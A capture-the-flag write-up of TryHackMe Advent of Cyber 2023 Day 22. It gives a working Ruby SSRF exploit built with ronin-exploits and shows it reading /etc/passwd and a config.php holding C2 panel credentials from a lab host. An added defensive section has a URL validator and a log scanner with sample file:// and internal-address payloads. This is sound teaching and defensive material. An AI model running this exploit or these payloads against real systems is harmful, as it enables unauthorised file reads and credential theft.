Solving Advent of Cyber 2023 Day 22 with ronin-exploits
— postmodern
This year I decided to try using Ronin to solve the [Advent of Cyber 2023] challenges. Let’s see how far I can get.
We made it to Day 22 of Advent of Cyber 2023. This challenge involves exploiting
a super simple Server Side Request Forgery (SSRF) vulnerability.
While most SSRF vulnerabilities allow sending HTTP requests to internal
web servers, the instructions hint that you can also send file:// URIs and
request local files. You could solve this challenge using only curl,
but I decided to use ronin-exploits to write an SSRF exploit that requests a
local file.
First we will use the ronin-exploits new command to generate a new web
exploit. We will also enable the Loot mixin
to store the requested files.
```console
$ ronin-exploits new --type web --loot jingle_bells_ssrf.rb
	erb	exploit.rb.erb	jingle_bells_ssrf.rb
	chmod	jingle_bells_ssrf.rb
```
Testing the vulnerable /getClientData.php HTTP end-point shows that local
files requested with file:// are returned in the HTTP response body.
Requesting a file that does not exist on the system results in an HTTP 200
response with an empty body, so the exploit must check the body and not just
the status code. To send the HTTP request, we will use the http_get helper
method, which accepts a path and additional query params, sends an HTTP GET
request, and returns the HTTP response object.
We will also need to define a file param for the local file we wish to
request via file:// SSRF. Since this is a super simple SSRF exploit,
we will only need to fill in the launch method.
```ruby
#!/usr/bin/env -S ronin-exploits run -f
require 'ronin/exploits/web'
require 'ronin/exploits/mixins/loot'

module Ronin
  module Exploits
    class JingleBellsSSRF < Web

      include Mixins::Loot

      register 'jingle_bells_ssrf'

      quality :poc
      release_date '2023-12-22'

      author "Postmodern", email: "postmodern.mod3@gmail.com"
      summary "Advent of Cyber 2023 Day 22"
      description <<~DESC
        A Basic SSRF exploit for Advent of Cyber 2023 Day 22 aka
        "Jingle Your SSRF Bells: A Merry Command & Control Hackventure".
      DESC

      references [
        "https://tryhackme.com/room/adventofcyber2023"
      ]

      # the local file to request through the SSRF
      param :file, required: true,
                   desc:     'The path of the local file to request'

      def launch
        file_uri = "file://#{params[:file]}"
        # GET /getClientData.php?url=file://... relative to the base_url param
        response = http_get('/getClientData.php', query_params: {url: file_uri})

        # a missing file still comes back as 200, but with an empty body
        if response.code == '200' && !response.body.empty?
          print_success "Got the file!"
          loot.add(params[:file], response.body)
        else
          fail("Failed to request the file: #{params[:file]}")
        end
      end

    end
  end
end
```
Now that our exploit is written, let’s run it!
```console
$ ./jingle_bells_ssrf.rb -p base_url=http://10.10.108.219 -p file=/etc/passwd
>>> Running exploit jingle_bells_ssrf ...
[+] Got the file!
>>> Exploit found the following loot:
  /etc/passwd:
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
    systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
    systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
    messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
    syslog:x:104:110::/home/syslog:/usr/sbin/nologin
    _apt:x:105:65534::/nonexistent:/usr/sbin/nologin
    tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
    uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
    tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
    sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
    landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
    pollinate:x:111:1::/var/cache/pollinate:/bin/false
    ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin
    systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
    ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
    lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
    mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false
```
We have successfully exploited the SSRF vulnerability and achieved local file
read access. The challenge instructions hint that we should try requesting
config.php from the /var/www/html/ directory, which may contain the C2
panel’s credentials.
```console
$ ./jingle_bells_ssrf.rb -p base_url=http://10.10.108.219 -p file=/var/www/html/config.php
>>> Running exploit jingle_bells_ssrf ...
[+] Got the file!
>>> Exploit found the following loot:
  /var/www/html/config.php:
    <?php
    $username = "mcgreedy";
    $password = "mcgreedy!@#$%";
    
    ?>
```
Jackpot!
As you can see, ronin-exploits makes it easy to write SSRF exploits and exfiltrate files.
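For the other side of this bug, here is the server-side check that would have closed the hole, plus a log scanner that flags the same request pattern after the fact. This is an added example and is not part of the original post or of ronin-exploits; the /getClientData.php path and its url param are the page's, while the combined-log-format lines, the `ssrf_url_allowed?` and `flag_ssrf_requests` names, and the sample log are assumptions constructed here.

```ruby
require 'uri'
require 'ipaddr'
require 'cgi'

# Schemes the endpoint legitimately needs; file://, gopher://, dict://, ... are rejected.
ALLOWED_SCHEMES = %w[http https].freeze

# Returns [allowed, reason] for a user-supplied fetch URL: checks the scheme and, for
# IP-literal hosts, rejects loopback/private/link-local ranges. Hostnames are not
# resolved here (assumption: the fetcher re-checks the resolved address before connecting).
def ssrf_url_allowed?(raw_url)
  uri    = URI.parse(raw_url.to_s)
  scheme = uri.scheme.to_s.downcase
  return [false, "scheme #{scheme.inspect} not allowed"] unless ALLOWED_SCHEMES.include?(scheme)
  host = uri.hostname.to_s                      # hostname strips IPv6 brackets
  return [false, 'missing host'] if host.empty?
  return [false, 'localhost not allowed'] if host.casecmp?('localhost')
  begin
    ip = IPAddr.new(host)
    return [false, "internal address #{host} not allowed"] if ip.loopback? || ip.private? || ip.link_local?
  rescue IPAddr::InvalidAddressError
    # plain hostname: nothing more to check without resolving it
  end
  [true, 'ok']
rescue URI::InvalidURIError => e
  [false, "unparseable url: #{e.message}"]
end

# Detection side: flag access-log requests to the endpoint whose url param fails the check.
LOG_RE = /\A(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/

def flag_ssrf_requests(log_lines)
  log_lines.filter_map do |line|
    m = LOG_RE.match(line) or next
    client, target = m[1], m[2]
    next unless target.start_with?('/getClientData.php')
    url = CGI.parse(URI.parse(target).query.to_s)['url'].first or next
    ok, reason = ssrf_url_allowed?(url)
    [client, url, reason] unless ok              # => [client_ip, url, reason]
  end
end

# Constructed sample log (not from the challenge box): a benign fetch, a file:// read, an internal target.
SAMPLE_LOG = [
  '203.0.113.7 - - [22/Dec/2023:10:00:01 +0000] "GET /getClientData.php?url=https%3A%2F%2Fexample.com%2Fclient.json HTTP/1.1" 200 512',
  '203.0.113.7 - - [22/Dec/2023:10:00:02 +0000] "GET /getClientData.php?url=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1" 200 2048',
  '203.0.113.7 - - [22/Dec/2023:10:00:03 +0000] "GET /getClientData.php?url=http%3A%2F%2F127.0.0.1%3A8080%2Fadmin HTTP/1.1" 200 0',
].freeze
```

Because the vulnerable endpoint answers 200 for both real and missing files, the log scanner keys on the url parameter rather than the status code or response size.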